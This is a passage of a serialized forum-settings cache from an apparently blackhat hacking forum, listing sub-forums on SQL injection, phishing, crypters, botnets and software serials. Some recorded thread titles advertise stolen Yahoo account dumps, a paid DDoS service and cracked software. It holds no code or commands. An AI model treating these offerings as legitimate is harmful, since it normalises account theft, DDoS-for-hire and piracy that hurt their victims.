Accounts\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:23:\"package_games_board.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:65;a:37:{s:3:\"fid\";s:2:\"65\";s:4:\"name\";s:5:\"Movie\";s:11:\"description\";s:83:\"Discuss about your favorite movies here. Get reviews about the latest movies here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"6\";s:10:\"parentlist\";s:4:\"6,65\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"228\";s:15:\"lastpostsubject\";s:39:\"Who\'s watched The Social Network movie?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"film.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:9;a:37:{s:3:\"fid\";s:1:\"9\";s:4:\"name\";s:22:\"Monetizing Techniques \";s:11:\"description\";s:75:\"If you\'re looking for methods to make more money online this is your forum.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"6\";s:10:\"parentlist\";s:3:\"6,9\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"228\";s:15:\"lastpostsubject\";s:48:\"? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:27:\"1339992422_emblem-money.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:8;a:37:{s:3:\"fid\";s:1:\"8\";s:4:\"name\";s:5:\"Music\";s:11:\"description\";s:57:\"Fan of Music? Discuss and post your favorite songs here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"6\";s:10:\"parentlist\";s:3:\"6,8\";s:9:\"disporder\";s:1:\"6\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"302\";s:15:\"lastpostsubject\";s:18:\"Who likes OFWGKTA?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:18:\"1339992375_juk.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:56;a:37:{s:3:\"fid\";s:2:\"56\";s:4:\"name\";s:12:\"Forum Games \";s:11:\"description\";s:35:\"All forum games will be held here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"7\";s:10:\"parentlist\";s:6:\"6,7,56\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:22:\"Ban the user above you\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:20:\"Rules for this forum\";s:5:\"rules\";s:135:\"1. Threads with 100 or more posts will be closed.\r\n2. No offsite games.\r\n3. You can not post more than thrice a day in the same thread.\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:26:\"package_games_emulator.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:83;a:37:{s:3:\"fid\";s:2:\"83\";s:4:\"name\";s:34:\"Miscellaneous Tutorials and Guides\";s:11:\"description\";s:86:\"All tutorials and guides that don\'t belong in any other section should be posted here.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"7\";s:10:\"parentlist\";s:6:\"6,7,83\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"5\";s:15:\"lastpostsubject\";s:36:\"[How to] Send a DMCA takedown notice\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:20:\"Rules for this forum\";s:5:\"rules\";s:253:\"1. No distributing of porn, pedophile or any similar sort of discussion.\r\n2. No illegal tutorials such as murdering, stealing etc.\r\n3. No program giveaways in this section.\r\n4. No tutorials on weapons creation.\r\n5. No blackhat activity discussions here.\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"tutorial.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:11;a:37:{s:3:\"fid\";s:2:\"11\";s:4:\"name\";s:9:\"Help Desk\";s:11:\"description\";s:73:\"New to hacking? Need help? Post all your questions here. Read forum rules\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,11\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"53\";s:15:\"lastpostsubject\";s:21:\"What can you do with?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"2\";s:10:\"rulestitle\";s:5:\"Rules\";s:5:\"rules\";s:136:\"1. This forum is for help only, not for tutorials. \r\n2. Please be patient, you can not expect a reply as soon as you post your question.\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:31:\"1339992459_Help_Circle_Blue.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:12;a:37:{s:3:\"fid\";s:2:\"12\";s:4:\"name\";s:9:\"Tutorials\";s:11:\"description\";s:96:\"This forum is for all hacking and setup tutorials and guides. Please share your tutorials here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,12\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"258\";s:15:\"lastpostsubject\";s:36:\"Big list Hacking tutorials with .txt\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:24:\"1339992570_graduated.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:13;a:37:{s:3:\"fid\";s:2:\"13\";s:4:\"name\";s:25:\"Website and Forum Hacking\";s:11:\"description\";s:122:\"SQL Injection is a common website and forum hacking technique used by many website hackers. Learn how to SQL Inject here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,13\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"4\";s:15:\"lastpostsubject\";s:35:\"400,000 Hacked Yahoo Accounts Dumps\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:34:\"1339992990_domain-names-px-png.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:14;a:37:{s:3:\"fid\";s:2:\"14\";s:4:\"name\";s:10:\"Anonymity \";s:11:\"description\";s:86:\"Discussions on staying Anonymous including Proxies and Virtual Private Networks (VPNs)\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,14\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"4\";s:15:\"lastpostsubject\";s:26:\"VPN Accounts With Guide :)\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"modem.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:46;a:37:{s:3:\"fid\";s:2:\"46\";s:4:\"name\";s:24:\"Phishing and Tabnabbing \";s:11:\"description\";s:70:\"A forum for discussions of phishing(Fake login pages) and tabnabbing. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,46\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"205\";s:15:\"lastpostsubject\";s:43:\"Did someone ever hack you through phishing?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:20:\"Rules for this forum\";s:5:\"rules\";s:295:\"1. No phishing discussions on Online Banks, such as PayPal, Liberty reserve etc.\r\n2. You are not allowed to post links to your phishing pages here.\r\n
3. We are not responsible for how you use this section, this section is for educational purposes.
\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:14:\"web_layout.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:15;a:37:{s:3:\"fid\";s:2:\"15\";s:4:\"name\";s:18:\"Tools and Programs\";s:11:\"description\";s:76:\"Share your favorite blackhat tools and programs here. Read the forum rules. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,15\";s:9:\"disporder\";s:1:\"6\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"1\";s:15:\"lastpostsubject\";s:14:\"WinRAR cracked\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"2\";s:10:\"rulestitle\";s:5:\"Rules\";s:5:\"rules\";s:209:\"1. Use the search button to see if the program is already posted or not. Updated versions are allowed.\r\n2. Do not request programs here.\r\n3. All programs must contain a virus scan, do NOT upload on virustotal.\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:41:\"1339992636_preferences-system-network.png\";s:18:\"ForumsRequirements\";s:1:\"5\";}i:20;a:37:{s:3:\"fid\";s:2:\"20\";s:4:\"name\";s:44:\"File Protection, Crypters, Cryptography etc \";s:11:\"description\";s:137:\"For discussion on keys, ciphers, and algorithms often used to keep information secret. Encryption is the art of concealing data and code.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,20\";s:9:\"disporder\";s:1:\"7\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"5\";s:15:\"lastpostsubject\";s:39:\"[3/14] War - Crypter [ScanTime] by cris\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:29:\"application-pgp-encrypted.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:21;a:37:{s:3:\"fid\";s:2:\"21\";s:4:\"name\";s:29:\"Botnets and IRC Bots, Zombies\";s:11:\"description\";s:46:\"Botnets, IRC Bots, Zombies and DDoS discussion\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,21\";s:9:\"disporder\";s:1:\"8\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"4\";s:15:\"lastpostsubject\";s:56:\"[Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"intranet.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:16;a:37:{s:3:\"fid\";s:2:\"16\";s:4:\"name\";s:41:\"Social Engineering and Human Manipulation\";s:11:\"description\";s:115:\"Social Engineering is the art of manipulating people into performing actions or divulging confidential information.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,16\";s:9:\"disporder\";s:1:\"9\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:41:\"[eBook][Special] iTzIpod\'s SEing Tutorial\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:19:\"guy_fawkes_mask.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:18;a:37:{s:3:\"fid\";s:2:\"18\";s:4:\"name\";s:28:\"AIM MSN IRC ICQ and IM Hacks\";s:11:\"description\";s:137:\"If you are into exploiting instant messaging systems then we have a perfect forum for you. Post here for AIM hacks and other IM exploits.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,18\";s:9:\"disporder\";s:2:\"10\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"9\";s:15:\"lastpostsubject\";s:26:\"Facebook Blaster Pro v10.0\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:18:\"1339993091_aim.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:43;a:37:{s:3:\"fid\";s:2:\"43\";s:4:\"name\";s:26:\"PIDs, Serials, CD Keys etc\";s:11:\"description\";s:123:\"A place to find all product identifications, Serials, product keys and much more. Post your favourite PID generators here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,43\";s:9:\"disporder\";s:2:\"11\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"228\";s:15:\"lastpostsubject\";s:12:\"Tons of PIDs\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:11:\"barcode.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:59;a:37:{s:3:\"fid\";s:2:\"59\";s:4:\"name\";s:6:\"Ebooks\";s:11:\"description\";s:48:\"Download all electronics books on Hacking here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"12\";s:10:\"parentlist\";s:8:\"10,12,59\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"302\";s:15:\"lastpostsubject\";s:37:\"[Ebook]Make $50+ a day usuing 